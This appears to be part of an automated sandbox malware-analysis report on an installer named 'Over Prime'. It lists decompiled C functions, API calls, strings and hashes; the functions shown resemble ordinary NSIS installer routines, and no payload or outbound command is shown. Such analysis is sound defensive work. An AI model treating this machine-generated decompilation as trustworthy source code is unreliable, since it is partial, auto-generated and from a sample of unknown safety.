DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067c6
0x004067cf
0x004067e6
0x004067e6
0x004067ed
0x004067f9
0x004067f9
0x004067fc
0x004067ff
0x00406804
0x00406806
0x0040680f
0x00406813
0x00406830
0x00406838
0x00406838
0x0040683d
0x0040683f
0x00406842
0x00406847
0x00406848
0x0040684c
0x0040684c
0x0040684d
0x00406854
0x00406856
0x0040685d
0x00000000
0x00000000
0x00406865
0x0040686b
0x00000000
0x00000000
0x00000000
0x0040686b
0x00406870

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816
C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e62
0x00404e6f
0x00404e75
0x00404eb3
0x00404eb3
0x00404ec2
0x00404ec9
0x00000000
0x00404ecb
0x00404e77
0x00404e86
0x00404e8e
0x00404e91
0x00404ea3
0x00404ea9
0x00404eb0
0x00000000
0x00404eb0
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x52c3a
					_t11 =  *0x42aa24; // 0x52c3e
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00052C3A,00000064,00052C3E), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 73B92655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E73B92655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E73B912BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M73B92784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x73b9407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x73b9409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73B91510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x73b9506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x73b9506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x73b9506c);
								goto L17;
							case 5:
								_push( *0x73b9506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x73b95000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E73B91381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E73B91312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x73b9265f
0x73b92661
0x73b92665
0x73b92674
0x73b92678
0x73b9267d
0x73b9267d
0x73b92685
0x73b9268c
0x73b92692
0x00000000
0x73b92699
0x00000000
0x00000000
0x73b926a1
0x73b926a5
0x73b926a8
0x73b926ac
0x73b926b3
0x73b926b7
0x73b926bd
0x73b926bf
0x73b926c1
0x73b926c1
0x73b926c8
0x00000000
0x00000000
0x73b926d1
0x00000000
0x00000000
0x73b926d8
0x73b926de
0x73b926e8
0x73b926ee
0x73b926f3
0x00000000
0x00000000
0x73b92714
0x00000000
0x00000000
0x73b926fa
0x73b92700
0x73b92701
0x73b92703
0x00000000
0x00000000
0x73b9271c
0x73b9271e
0x73b92724
0x73b9272a
0x73b9272a
0x00000000
0x00000000
0x73b92692
0x73b9272d
0x73b9272d
0x73b92732
0x73b92743
0x73b92743
0x73b92749
0x73b9274e
0x73b92753
0x73b9275f
0x73b92764
0x00000000
0x73b92769
0x73b92755
0x73b92756
0x73b9276a
0x73b9276a
0x73b92753
0x73b9276b
0x73b9276c
0x73b9276f
0x73b92783

APIs

Part of subcall function 73B912BB: GlobalAlloc.KERNEL32(00000040,?,73B912DB,?,73B9137F,00000019,73B911CA,-000000A0), ref: 73B912C5

GlobalFree.KERNEL32(?), ref: 73B92743
GlobalFree.KERNEL32(00000000), ref: 73B92778

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 3de5b365144eae855c3657e79a6e46aa8e75630814f4f503b00b747d4ee0ce3c
Instruction ID: 82fb83d91d5aeac1d4140f14f199948ae2567a0e912243939f449ae22b2ea32d
Opcode Fuzzy Hash: 3de5b365144eae855c3657e79a6e46aa8e75630814f4f503b00b747d4ee0ce3c
Instruction Fuzzy Hash: E831107290410DEFF726AF61CED4E2A77BAEB863007264139F105ABA60D7355C00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 73B92480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E73B92480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E73B9135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E73B912E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M73B925F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E73B913B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E73B913B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x73b9506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x73b9506c, __eax,  *0x73b9506c, 0, 0);
									goto L27;
								case 4:
									__eax = E73B912CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E73B913B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x73b9506c =  *0x73b95074 + ( *(__esi + 0x18) - 1) *  *0x73b9506c * 2 + 0x18;
									 *__ebx =  *0x73b95074 + ( *(__esi + 0x18) - 1) *  *0x73b9506c * 2 + 0x18;
									asm("cdq");
									__eax = E73B91510(__edx,  *0x73b95074 + ( *(__esi + 0x18) - 1) *  *0x73b9506c * 2 + 0x18, __edx,  *0x73b95074 + ( *(__esi + 0x18) - 1) *  *0x73b9506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E73B912CC(0x73b95044);
					goto L10;
				}
			}

0x73b92494
0x73b92498
0x73b924a3
0x73b924a3
0x73b924aa
0x73b924af
0x00000000
0x00000000
0x73b924b3
0x73b924b6
0x00000000
0x00000000
0x73b924bb
0x73b924c6
0x73b924d6
0x00000000
0x73b924cd
0x73b924cf
0x73b924e5
0x00000000
0x73b924e5
0x73b924bd
0x73b924bd
0x73b924e6
0x73b924e6
0x73b924e8
0x73b924ec
0x73b924ec
0x73b924ef
0x73b924ef
0x73b924f7
0x73b924ff
0x73b92502
0x73b925c1
0x73b925c2
0x73b925cd
0x73b925f7
0x73b925f7
0x73b925dd
0x73b925e9
0x73b925df
0x73b925df
0x73b925df
0x00000000
0x73b92508
0x73b92508
0x00000000
0x73b9250f
0x00000000
0x00000000
0x73b92517
0x00000000
0x00000000
0x73b92525
0x73b92527
0x00000000
0x00000000
0x73b92548
0x73b9254e
0x73b92551
0x73b92553
0x73b92563
0x00000000
0x00000000
0x73b92530
0x73b92535
0x73b92538
0x73b92539
0x00000000
0x00000000
0x73b9256f
0x73b92575
0x73b92576
0x73b92579
0x73b9257a
0x73b9257c
0x00000000
0x00000000
0x73b92588
0x73b9258b
0x73b92597
0x73b92599
0x00000000
0x00000000
0x73b925a5
0x73b925b1
0x73b925b4
0x73b925b6
0x73b925b9
0x00000000
0x00000000
0x73b92508
0x73b92502
0x73b924db
0x73b924e0
0x00000000
0x73b924e0

APIs

GlobalFree.KERNEL32(00000000), ref: 73B925C2

Part of subcall function 73B912CC: lstrcpynW.KERNEL32(00000000,?,73B9137F,00000019,73B911CA,-000000A0), ref: 73B912DC

GlobalAlloc.KERNEL32(00000040), ref: 73B92548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73B92563

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: a5b12f5670a828a11ef693f43d5ca64af0230b2c3680581759015bad6c5f190c
Instruction ID: 5c275dea00471d96e154246e59185d0a35bb5e25da21449a50d319154820c563
Opcode Fuzzy Hash: a5b12f5670a828a11ef693f43d5ca64af0230b2c3680581759015bad6c5f190c
Instruction Fuzzy Hash: A24192B180830DDFF725EF259990B6677B8FB84310F12853DE94A8F681E730A544CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
